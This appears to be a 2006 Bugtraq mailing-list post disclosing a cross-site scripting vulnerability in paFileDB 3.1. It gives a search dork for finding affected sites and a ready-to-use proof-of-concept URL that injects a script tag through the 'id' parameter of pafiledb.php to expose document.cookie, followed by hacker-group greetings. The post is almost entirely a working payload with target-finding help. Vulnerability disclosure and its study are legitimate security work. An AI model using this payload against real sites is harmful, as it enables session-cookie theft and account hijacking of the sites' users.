
Date: 8 Oct 2006 18:02:24 -0000
From: zarloule04@...mail.fr
To: bugtraq@...urityfocus.com
Subject: XSS IN paFileDB 3.1

XSS IN paFileDB 3.1 BY b0rizQ -------------------                                                
ZARLOULE04 [at] HOTMAIL [dot] FR                 
-------------------------------------------------

FILE : pafiledb.php

Dork : (PHP Arena) 
 
http://[traget]/pafiledb.php?action=category&id=1"><script>alert(document.cookie);</script>

-------------------------------------------------
-------------------
-     By b0rizQ   -
-------------------
Greetz : boulala and Crack_Man and Root-hacked and RaChidox and Zouhaire___159

